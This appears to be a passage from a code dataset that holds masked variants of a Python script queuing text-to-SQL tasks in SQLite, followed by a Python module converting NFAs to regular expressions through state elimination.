'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? 
(int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? 
(y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? 
(y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<function token>\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<function token>\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while 
True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
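The enqueue script above assumes a SQLite file that already contains databases and tasks tables. Its INSERT statement fixes the column names of tasks; a compatible bootstrap (the column types and the file name are guesses, since the real schema lives elsewhere in the duoquest project) could look like this:

import sqlite3

conn = sqlite3.connect('duoquest.db')  # the real path comes from config.ini's [db] path
conn.execute('''CREATE TABLE IF NOT EXISTS tasks (
    tid TEXT PRIMARY KEY,  -- uuid4 string
    db TEXT,               -- database name, validated against the databases table
    nlq TEXT,              -- natural-language query
    tsq_proto BLOB,        -- serialized TableSketchQuery protobuf
    status TEXT,           -- starts as 'waiting'
    time INTEGER           -- unix timestamp
)''')
conn.execute('CREATE TABLE IF NOT EXISTS databases (name TEXT PRIMARY KEY)')
conn.commit()
conn.close()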
94
2fe20f28fc7bba6b8188f5068e2b3c8b87c15edc
from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from functools import reduce  # reduce is not a builtin on Python 3
from os.path import commonprefix

DEBUG = False

LAMBDA = u'\u03bb'
PHI = u'\u00d8'


def copyDeltas(src):
    # Deep-enough copy of the delta table: two dict levels plus a copied destination set.
    out = dict()
    for k in src:
        out[k] = dict()
        for k2 in src[k]:
            out[k][k2] = copy(src[k][k2])

    return out


def replaceNode(nfa, old, new):
    if DEBUG:
        print('R_Start(%s, %s) ---' % (old, new), nfa)
    if old in nfa._deltas:
        for input in nfa._deltas[old]:
            nfa.addDelta(new, input, nfa._deltas[old][input])
        del nfa._deltas[old]
    if DEBUG:
        print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)

    deltas_temp = copyDeltas(nfa._deltas)
    for src in deltas_temp:
        for input in deltas_temp[src]:
            if old in deltas_temp[src][input]:
                nfa._deltas[src][input].remove(old)
                nfa._deltas[src][input].add(new)
    if DEBUG:
        print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)


def commonsuffix(seq):
    def reverse(s):
        out = ''
        for c in reversed(s):
            out += c
        return out

    seq = [reverse(i) for i in seq]
    return reverse(commonprefix(seq))


class NetworkNFA(NFA):
    def __init__(self, nfa):
        if type(nfa) is not NFA:
            raise AutomataError('Can create a NetworkNFA only from an NFA.')

        if all([len(i) == 1 for i in nfa.charset]):
            self._charset = copy(nfa._charset)
        else:
            self._charset = set(['{%s}' % i for i in nfa._charset])

        self._nodes = copy(nfa._nodes)
        self._deltas = copyDeltas(nfa._deltas)
        self._start = nfa._start
        self._terminals = copy(nfa._terminals)

    def addDelta(self, node, input, dest):
        if set(input) - (self._charset.union(set('()+*'))):
            raise AutomataError('%s contains symbols not in charset.' % input)

        if type(node) is Node:
            if type(dest) is set and all([type(i) is Node for i in dest]):
                if len(dest):
                    if node in self._deltas:
                        if input in self._deltas[node]:
                            self._deltas[node][input] = self._deltas[node][input].union(dest)
                        else:
                            self._deltas[node][input] = dest
                    else:
                        self._deltas[node] = {input: dest}
            elif type(dest) is Node:
                if node in self._deltas:
                    if input in self._deltas[node]:
                        self._deltas[node][input].add(dest)
                    else:
                        self._deltas[node][input] = set([dest])
                else:
                    self._deltas[node] = {input: set([dest])}
            else:
                raise AutomataError(
                    'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)
        else:
            raise AutomataError(
                'Delta source must be Node, not %s.' % type(node).__name__)

    def remDelta(self, node, input):
        if set(input) - (self._charset.union(set('()+*'))):
            raise AutomataError('%s contains symbols not in charset.' % input)

        if type(node) is Node:
            if node in self._deltas and input in self._deltas[node]:
                self._deltas[node].pop(input)
                if len(self._deltas[node]) == 0:
                    del self._deltas[node]
        else:
            raise AutomataError(
                'Delta source must be a Node, not %s' % type(node).__name__)

    def isValid(self):
        if len(self._nodes) == 0:
            return False
        if self._start not in self._nodes:
            return False

        for i in self._terminals:
            if i not in self._nodes:
                return False

        if not set(self._deltas.keys()).issubset(self._nodes):
            return False

        for key in self._deltas:
            for char in self._deltas[key]:
                if set(char) - (self._charset.union(set('()+*'))):
                    return False

        return True

    def apply(self, input, start):
        raise AutomataError('NetworkNFA does not allow direct application.')

    def __repr__(self):
        ret = '<NetworkNFA>\n'
        ret += '  Charset: {%s}\n' % ','.join(filter(None, self._charset))
        ret += '    Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
        ret += 'Terminals: {%s}\n' % ','.join(
            [i.label for i in self._terminals])
        ret += '    Start: %s\n' % (self._start and self._start.label)
        ret += '    Delta: '
        if len(self._deltas):
            for qFrom in self._deltas:
                for input in self._deltas[qFrom]:
                    ret += 'D(%s, %s) -> {%s}\n           ' % (qFrom.label, input or 'lambda',
                                                               ','.join([i.label for i in self._deltas[qFrom][input]]))
            ret = ret.rstrip() + '\n'
        else:
            ret += 'None\n'
        ret += '    Valid: %s\n' % ('Yes' if self.isValid() else 'No')
        ret += '</NetworkNFA>'

        return ret


def nfa2regex(nfa):
    if not nfa.isValid():
        raise AutomataError(
            'NFA must be in a valid state to be converted to a regex.')

    network = NetworkNFA(nfa)

    if DEBUG:
        print('START', network)

    # Take care of multi-terminals
    # if len(network.terminals) > 1:
    #     end = Node('qf')
    #     network.addNode(end)
    #     for i in copy(network.terminals):
    #         network.addDelta(i, '', end)
    #         network.remTerminal(i)
    #     network.addTerminal(end)

    # Add dummy start and end nodes
    start = Node('qs')
    network.addNode(start)
    network.addDelta(start, '', network.start)
    network.start = start

    end = Node('qf')
    network.addNode(end)
    for i in network.terminals:
        network.addDelta(i, '', end)
        network.remTerminal(i)
    network.addTerminal(end)
    if DEBUG:
        print('Dummies added: ', network)

    # Collapse parallel edges between the same pair of nodes into one (a+b+...) edge
    for src in network.nodes:
        delta_temp = network.getDelta(src)
        for dest in network.nodes:
            chars = []
            for input in delta_temp:
                if input and dest in delta_temp[input]:
                    chars.append(input)

            if len(chars):
                for c in chars:
                    delta_temp[c].remove(dest)
                    if len(delta_temp[c]) == 0:
                        del delta_temp[c]

                if len(chars) > 1:
                    chars = '(' + '+'.join(chars) + ')'
                else:
                    chars = '+'.join(chars)
                network.addDelta(src, chars, dest)
    if DEBUG:
        print('Collapsed: ', network)

    # Collect pliable (removable) nodes
    pliableNodes = list(network.nodes)
    pliableNodes.remove(network.start)
    for n in network.terminals:
        pliableNodes.remove(n)

    # Build a distance-from-terminal table
    nodeFinalDist = {}
    maxDist = len(network.nodes) ** len(network.nodes)  # Lazy stand-in for infinity
    for n in network.nodes:
        nodeFinalDist[n] = maxDist

    nodeFinalDist[network.terminals[0]] = 0
    toProcess = list(network.nodes)
    toProcess.remove(network.terminals[0])

    while len(toProcess):
        for node in toProcess:
            dests = network.getDelta(node).values()
            if len(dests) == 0:
                dests = set([])
            else:
                dests = reduce(set.union, network.getDelta(node).values())

            if len(dests) == 0:
                toProcess.remove(node)
            else:
                minDist = min([nodeFinalDist[i] for i in dests])
                if minDist != maxDist:
                    nodeFinalDist[node] = minDist + 1
                    toProcess.remove(node)

    # Sort pliable nodes by distance from terminal
    pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
    if DEBUG:
        print('Pliables: ', pliableNodes)

    for node in pliableNodes:
        # Remove node
        network.remNode(node)

        # Save its delta
        delta = copy(network.getDelta(node))

        # Convert self-loops to a starred regex
        loops = []
        for input in delta:
            if node in delta[input]:
                if len(input):
                    loops.append(input)
        loopRegex = '+'.join(loops)
        if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):
            loopRegex = '(' + loopRegex + ')*'
        elif len(loopRegex) >= 1:
            loopRegex = loopRegex + '*'

        # Remove loops
        for input in copy(delta):
            if delta[input] == set([node]):
                del delta[input]
            elif node in delta[input]:
                delta[input].remove(node)

        # Search for lambda-closure equivalence
        if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
            eligible = []
            for dest in delta['']:
                delta_temp = network.getDelta(dest)
                if '' in delta_temp and node in delta_temp['']:
                    eligible.append(dest)

            if len(eligible):
                replaceNode(network, node, eligible[0])
                continue

        # Remove delta
        try:
            del network._deltas[node]
        except KeyError:  # No deltas remaining, had only loops
            continue

        if DEBUG:
            print('Working on connections: ', node, delta)
        # Reroute every connection that passed through this node
        deltas_temp = copyDeltas(network._deltas)
        for src in deltas_temp:
            for input in deltas_temp[src]:
                tempDeltaDest = network.getDelta(src)[input]
                if node in tempDeltaDest:
                    tempDeltaDest.remove(node)
                    if len(tempDeltaDest) == 0:
                        network.remDelta(src, input)

                    for input2 in delta:
                        for dest in delta[input2]:
                            if not (src == dest and (input + loopRegex + input2) == ''):
                                network.addDelta(src, input + loopRegex + input2, dest)
                                if DEBUG:
                                    print('New Delta:', src, input, loopRegex, input2, dest, network)

    # Extract common prefix/suffix
    branches = list(network.getDelta(network.start).keys())  # list() so the Python 3 keys view is subscriptable
    if len(branches) == 1:
        regex = branches[0]
    else:
        prefix = commonprefix(branches)
        suffix = commonsuffix(branches)
        branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]
                    for i in branches]
        branches.sort(key=len)
        if len(prefix) or len(suffix):
            regex = prefix + '(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix
        else:
            regex = '+'.join([i or LAMBDA for i in branches]) or PHI

    return regex
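As originally written for Python 2, the module relied on the builtin reduce and on dict.keys() returning a list; the reconstruction above adds the functools import and a list() call so it also runs under Python 3. A usage sketch follows. The Node and NFA constructors live in the project's base and automata modules, whose signatures are not shown here, so the construction calls below are assumptions based only on the methods the converter itself invokes (addNode, addDelta, addTerminal, the start setter):

from base import Node
from automata import NFA

# Hypothetical construction of an NFA for a*b (loop on 'a', then a single 'b').
q0, q1 = Node('q0'), Node('q1')
nfa = NFA()                # constructor arguments, if any, are assumed away here
nfa.addNode(q0)
nfa.addNode(q1)
nfa.start = q0
nfa.addTerminal(q1)
nfa.addDelta(q0, 'a', q0)  # self-loop on 'a'
nfa.addDelta(q0, 'b', q1)

print(nfa2regex(nfa))      # expected to yield an expression equivalent to a*b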
[ "from util import AutomataError\nfrom automata import NFA\nfrom base import Node\nfrom copy import copy, deepcopy\nfrom os.path import commonprefix\n\nDEBUG = False\n\nLAMBDA = u'\\u03bb'\nPHI = u'\\u00d8'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n\n if all([len(i) == 1 for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set(['{%s}' % i for i in nfa._charset])\n\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - (self._charset.union(set('()+*'))):\n raise AutomataError('%s contains symbols not in charset.' % input)\n\n if type(node) is Node:\n if type(dest) is set and all([type(i) is Node for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][input].union(\n dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)\n else:\n raise AutomataError(\n 'Delta source must be Node, not %s.' % type(node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - (self._charset.union(set('()+*'))):\n raise AutomataError('%s contains symbols not in charset.' 
% input)\n\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError(\n 'Delta source must be a Node, not %s' % type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n\n for i in self._terminals:\n if i not in self._nodes:\n return False\n\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - (self._charset.union(set('()+*'))):\n return False\n\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join(\n [i.label for i in self._terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, input or 'lambda', ','.join(\n [i.label for i in self._deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n\n network = NetworkNFA(nfa)\n\n if DEBUG:\n print('START', network)\n\n# Take care of multi-terminals\n# if len(network.terminals) > 1:\n## end = Node('qf')\n# network.addNode(end)\n# for i in copy(network.terminals):\n## network.addDelta(i, '', end)\n# network.remTerminal(i)\n# network.addTerminal(end)\n\n # Add a dummy start and end nodes\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n\n # Collapse connections\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n\n # Collect pliable nodes\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n\n # Build a distance-from-terminal table\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes) # Lazy\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n\n if len(dests) == 0:\n toProcess.remove(node)\n 
else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n\n # Sort pliable nodes by distance from terminal\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n\n for node in pliableNodes:\n # Remove Node\n network.remNode(node)\n\n # Save delta\n delta = copy(network.getDelta(node))\n\n # Convert loops to regex\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n\n # Remove loops\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n\n # Search lambda-closure equivalence\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n\n # Remove delta\n try:\n del network._deltas[node]\n except KeyError: # No deltas remaining, had only loops\n continue\n\n if DEBUG:\n print('Working on connections: ', node, delta)\n # Check all possible connections through this node\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and (input + loopRegex + input2) == ''):\n network.addDelta(\n src, input + loopRegex + input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n\n # Extract common prefix/suffix\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]\n for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + \\\n '(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix\n else:\n regex = '+'.join([i or LAMBDA for i in branches]) or PHI\n\n return regex\n", "from util import AutomataError\nfrom automata import NFA\nfrom base import Node\nfrom copy import copy, deepcopy\nfrom os.path import commonprefix\nDEBUG = False\nLAMBDA = u'λ'\nPHI = u'Ø'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in 
reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not 